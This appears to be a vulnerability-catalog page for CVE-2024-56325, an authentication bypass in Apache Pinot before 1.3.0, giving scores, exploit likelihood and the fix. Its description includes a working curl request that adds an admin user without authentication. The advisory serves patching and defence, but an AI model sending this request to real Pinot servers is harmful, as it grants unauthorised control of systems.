CVE & CISA-KEV Catalog

CVE-2024-56325

CRITICALEPSS 100th pctl
9.8
CVSS v3
NVD

Description

Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.

How to fix

Remediation Available
pinotNVD
Affected:< 1.3.0Fixed in:1.3.0CVE-2024-56325derived from NVD

TridentStack Control can deploy fixes like this automatically across your Windows, macOS, and Linux fleet. See how it works

Remediation is compiled from vendor and distribution security advisories. Always confirm against the linked source for your exact version and platform.

CVSS v3 Vector

Exploitability

Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredNone
User InteractionNone
ScopeUnchanged

Impact

ConfidentialityHigh
IntegrityHigh
AvailabilityHigh

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Exploit Intelligence

79.37%probability of exploitation in 30 days
100thpercentile

Very high risk: more likely to be exploited than 100% of all known CVEs.

References

Vendor Advisory1
Third-Party Advisory1

Related Vulnerabilities

Other CWE-288 vulnerabilities, ordered by exploit likelihood. View all

CVESeverityCVSSEPSSExploitedFix
CVE-2024-1709Critical10.0100%KEV + RansomFix
CVE-2023-42793Critical9.8100%KEV + RansomFix
CVE-2024-27198Critical9.8100%KEV + RansomFix
CVE-2025-4427Medium5.3100%KEVFix
CVE-2024-55591Critical9.898%KEV + RansomFix
CVE-2023-46747Critical9.897%KEV + Ransom-

Common questions

How do I fix CVE-2024-56325?

Upgrade pinot to 1.3.0 or later.

Is CVE-2024-56325 being actively exploited?

Not that we know of. CVE-2024-56325 is not in the CISA Known Exploited Vulnerabilities catalog. Its EPSS score of 79.4% is the estimated probability that it will be exploited in the next 30 days. That is higher than 100% of all scored CVEs.

How severe is CVE-2024-56325?

CVE-2024-56325 has a CVSS v3 base score of 9.8, rated critical. CVSS rates the technical impact if the vulnerability is exploited, not how likely that is, so weigh it alongside the exploit-prediction score when you decide what to patch first.

What does CVE-2024-56325 affect?

Published advisories record a fix for pinot (NVD). Only products with a sourced advisory are listed, so treat this as what we can cite rather than a complete inventory.

Embed a live status badge for CVE-2024-56325
CVE-2024-56325 severity badge

Markdown

[![CVE-2024-56325](https://tridentstack.com/cve/badge/CVE-2024-56325.svg)](https://tridentstack.com/cve/CVE-2024-56325)

HTML

<a href="https://tridentstack.com/cve/CVE-2024-56325"><img src="https://tridentstack.com/cve/badge/CVE-2024-56325.svg" alt="CVE-2024-56325"></a>

Find and fix vulnerabilities across your fleet

TridentStack Control continuously scans your Windows, macOS, and Linux fleet for known vulnerabilities, prioritizes them by severity and active exploitation, and patches them automatically.

See how it worksStart freeThis CVE lookup is free and always will be.

This product uses NVD data but is not endorsed or certified by the NVD. EPSS scores courtesy of FIRST.org (https://www.first.org/epss). Source: CISA KEV Catalog. Data as of 2025-07-15.